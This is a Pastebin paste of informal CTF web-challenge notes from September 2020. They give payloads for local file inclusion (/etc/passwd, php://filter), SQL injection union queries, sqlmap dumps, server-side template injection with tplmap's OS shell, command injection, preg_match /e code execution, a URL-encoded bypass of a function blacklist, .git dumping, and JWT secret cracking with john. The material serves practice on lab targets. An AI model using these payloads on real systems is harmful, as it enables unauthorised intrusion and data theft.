Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Today Knowledge (shellshock vulnerability) 9/22/2020
- #### https://blog.cloudflare.com/inside-shellshock/
- # Write up for Viseccon CTF
- #### https://github.com/Yash-Amin/virsecconCTF/tree/master/Web
- #### https://www.youtube.com/watch?v=_d82Ia0RV0w
- 9/22/2020
- # Countdown
- Firstly click the link and the alert was appear. You are too late !!!!!!!
- Now, i pass the burpsuite and increase the cookies value. Now, i get the flag!
- * view the source of any PHP file
- ** php://filter/convert.base64-encode/resource=index
- ** fopen wrappers with the following functions: include, include_once, require, require_once.
- # Hot Access
- RC --> View Page Source
- I found the links that were used to load php files. For example --> <a href="http://jh2i.com:50016/?m=modules/date.php" . So, this may be LFI and i change the query /etc/passwd or in window \etc\passwd <<<< ?m=/etc/passwd >>>> This will show etc/passwd!!
- The next step is two ways. One way is--> to try the ?m=.htacess or use php://filter/convert.base64-encode/resource=index.php
- 1st way --> to enter .htacess and you can see the directory and i put this after the parameter --> ?m=/var/www/html/sshh_dont_tell_i_hid_the_flag_here and i get the flag!
- 2nd way --> ?m= php://filter/convert.base64-encode/resource=index.php ... Brute force with lfi.txt ---> .htacess and i found the directory and paste this directory after the parameter. Now, i get the flag.
- 9/23/2020
- **strcmp is a function created to compare strings.** we use array to bypass strcmp string !!! flag[]=""
- # PHPJuggler
- In view source, i see the function of strcmp!! So, i use the burp and bypass the strcmp. Therefore, i change flag=anything to flag[]=anything. TAN TANNN TAN !!!!!!!
- ** {{ ... }} for Expressions to print to the template output "jinja2 template"
- ** Tplmap – Open Source Tool to Scan For Server Side Template Injection Vulnerabilities
- ** git clone https://github.com/epinna/tplmap
- python tplmap.py -u url -d "variable=*"
- # Mask
- Hint::: Flask application ---> So, i test {{2*5}}, it is work!!. Therefore, i apply the tplmap for server side template injection!!
- python tplmap -u url -d "mask=*" # mask = varialble
- Return tplmap providing one of the following option. !! --os-shell and then python tplmap -u url -d "mask=*" --os-shell
- Run commands on the operating system
- $ls
- $cat flag.txt BOMMMMM!!!!!!!!!
- # Character Web Shell
- I pass the burp and i saw the parameter. so, I test the parameter with ?c=ls or ?c=;ls it is work. i scroll the output and i found the flag.txt. So, i read the flag.txt. http://...../flag.txt, in another way, ?c=cat */*. W0W!!!! Wowwww!!!! Wow!
- # Sequetilis
- I get the new idea in this challenge! If i see the search form, i test whether it is sql or not!!!
- ## ' or 1=1 -- - ## '+or+'1'='1 Then, i want to know the number of column and i write this command --> ' order by 1 -- - and 2 and 3,4
- #### ' union select 1,2,3 -- - # ' union select table_schema,2,table_name from information_schema.tables-- - OR
- ## ' union select group_concat(table_name),2,3 from information_schema.tables -- -
- #### ' union select column_name,2,3 from information_schema.columns -- - OR
- ## ' union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database()-- -
- #### ' union select value,2,3 from flag -- -
- ## ' union select group_concat(column_name),2,3 from information_schema.columns where column_name='flag' -- -
- ## ' union select value,2,3 from flag -- -
- **** https://location-href.com/web-security/
- 9/24/2020
- ** GitDumper
- * Downloading .git repositories from the web server which do not have directory listing enabled.
- usage --> ./gitdumper.sh -h
- # Dairy Products
- git milk?
- So, i try the url with git :) /.git like "http://142.93.3.19:50008/.git"
- I use gitdumper to download the repository!!
- ### ./gitdumper.sh http://142.93.3.19:50008/.git dump # if u have a file, u first delete this file. # rm -r demo. After downloading completed:
- ### cd ../Extactor ## ls ## if having a file, u should delete. #rm -r output
- ### ./extractor.sh ../Dumper/dump/ output
- ### cd output ### grep -rn "LLS{" OHHHHHHHHHHHHHHHHH!!!!!!!!! SoOOOO DiZzy !!!!!!!!!!!!!!!!!!!
- # Irregular Function
- **preg_match -> regular expression match! ** preg_match(/php/i ---> i means case-insensitive search !!! @pattern part
- In this challenge, I notice that the regex function. I know that preg_match function was vulnerable to remote code execution (RCE).
- So, by pass this function with /e in pattern like /quick/e. And try to read /etc/passwd using system function. system('/etc/passwd') and then system('ls -al').As a result, this found the irregular word and read like system('cat irregular words'). Another way! in burp suite pattern = /(.*)/e replace = `ls+-la` text = test and for file read GET /irregular word
- # GET Encoded
- I visit the link and i found this only word. "Machine hunts for more than humans do"
- Firstly, i try that url --> jh2i.com:50013/robots.txt. Wow!! Disallow: /?debug >>>> jh2i.com:50013/?debug >>>
- $blacklist=assert|system|passthru|exec.... >> and we will check-> if (preg_match("/$blacklist/i",$_SERVER['REQUEST_URL'])){die("Go away hacker');} -> So, i use Burp and GET /?system=ls HTTP/1.1 and Send. But, i see error. URL decode in this system function in Decode tab and URL encode --> and copy and paste GET /?%73%79%73%74%65%6d=ls. i found ----.php file and GET /?%73%79%73%74%65%6d=----.php and i found error again. Finally, I change the php file to URL encode. BOMMM!!!!!!!!!!!!!!
- # Eyeless
- Firstly, i test the username ==> ' or 1=1 -- - and password=1111 and it appears Good Job. But no flag HERE!! Dam! I know that it is sql injection. Then, i pass the developer tools' and take params. Now, i use sql map ## sqlmap -u "url" --data="param" --dbs
- if more faster than that ## sqlmap -u "url" --data="param" --dbs --time-sec=2 threads 10
- Skip --> # sqlmap -u "url" --data="param" -D eyeless -T users --dump --time-sec=2
- ARRR!!! I get it.
- # JaWT
- This challenge is about JSON Web Token. This challenge is need to change the other users to admin. But we changing the value to admin without knowing the secret key is not possible. For finding the secret key, we need to use john the ripper in linux.
- jwt debugger -> jwt.io(in browser)
- 1. Copy cookies value and Paste in Encoded in jwt debugger -> WE see the three parts ->payload,header,signature
- 2. Copy the cookies and save as something.txt
- 3. #john ./picoJWT-textfile.txt --wordlist=./rockyou.txt (/usr/share/wordlists/rockyou.txt)
- OR
- 3. john something.txt -> john -show something.txt
Add Comment
Please, Sign In to add comment